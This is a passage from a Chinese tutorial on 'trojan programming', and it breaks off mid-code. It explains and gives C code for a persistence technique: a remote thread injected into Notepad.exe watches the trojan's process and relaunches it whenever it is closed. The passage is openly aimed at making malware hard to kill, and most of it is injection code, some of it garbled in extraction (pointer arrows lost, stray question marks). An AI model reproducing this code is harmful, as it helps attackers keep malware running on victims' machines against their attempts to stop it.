木马编程DIY线程守护.docVIP

木马编程DIY之线程守护文/图 冷风 要防止自己的程序被关闭,通常有两种方法1.像IcesWord一样HOOK系统底层的函数2.使用线程保护。这里我们主要学习线程保护的方法线程保护的思路就是让其它程序监视自己,如果自身程序退出了,那么监视程序就重新启动,这个过程我简单画了一个图如图1所示跟据图示1我们来分析一下线程守护的思路,并编程实现一个简单的线程守护程序，本程序完成的功能是把监视代码插入到Notepad.exe进程以监视程序本身，如果自身被关闭，Notepad.exe进程将重新启动自身程序，以达到不死的效应,以下代码在VC6中编译通过现在我们重新整理一下思路，首先我们找一个其它进程做为我们的保护神并把自己进程的句柄传保护神，保护神通过用WaitForSingleObject函数来检测句柄来判断要保护的进程是否结束，如果结束就重新启动我们的程序.跟据上面的思路我们来分析细节的实现1.检测并保护程序的远程线程代码因为保护自己的代码要注入到Notepad.exe进程，而执行在远程线程代码的API都需要重新定位，为解决这个问题我们定义如下的结构typedef struct _remoteparameter{??? DWORD??? ??? rpWaitForSingleObject;??? DWORD??? ??? rpOpenProcess;??? DWORD?????? rpWinExec;??? DWORD??? ??? rpProcessPID;?????????? ??? HANDLE??? ??? rpProcessHandle;??? char??? ??? path[MAX_PATH];}REMOTEPARAM;这个结构中包的前三项为远程线程中需要使用的API函数, rpProcessPID为要保护的进程PID,rpProcessHandle用来保存要保护进程的句柄path为当程序被关闭时需要启动的程序路径。远程线程函数如下DWORD WINAPI remote(LPVOID pvparam){??? REMOTEPARAM *rp=(REMOTEPARAM*)pvparam;? //传递进来的信息??? typedef UINT??? ??? ??? (WINAPI *EWinExec)??? ??? ??? ??? (LPCSTR, UINT);??? typedef HANDLE??? ??? ??? (WINAPI *EOpenProcess)??? ??? ??? (DWORD, BOOL, DWORD);??? typedef DWORD??? ??? ??? (WINAPI *EWaitForSingleObject)??? (HANDLE, DWORD);??? EWinExec??? ??? ??? ??? tWinExec;??? EOpenProcess??? ??? ??? tOpenProcess;??? EWaitForSingleObject??? tWaitForSingleObject;??? tOpenProcess??? ??? ??? =(EOpenProcess)rp-rpOpenProcess;??? tWaitForSingleObject??? =(EWaitForSingleObject)rp-rpWaitForSingleObject;??? tWinExec??? ??? ??? ??? =(EWinExec)rp-rpWinExec;??? rp-rpProcessHandle=tOpenProcess(PROCESS_ALL_ACCESS,FALSE,rp-rpProcessPID);//打开要保护的进程??? tWaitForSingleObject(rp-rpProcessHandle,INFINITE);//要保护的进程是否结束??? ??? tWinExec(rp-path, SW_SHOW);//如果结束就重新启动程序??? return 0;}2.将remote函数代码注入Notepad.exe进程并启动这里为了方便我定义成了一个函数，使用时只要提供要注入的进程名称就可以完成线程守护的功能,它的返回值是远程线程的句柄其实现如下:HANDLE CreateRemoteThreadProc(char* ProcessName){??? ??? HANDLE??? ThreadHandle;??? ??? char??? FilePath[MAX_PATH];??? ??? GetModuleFileNa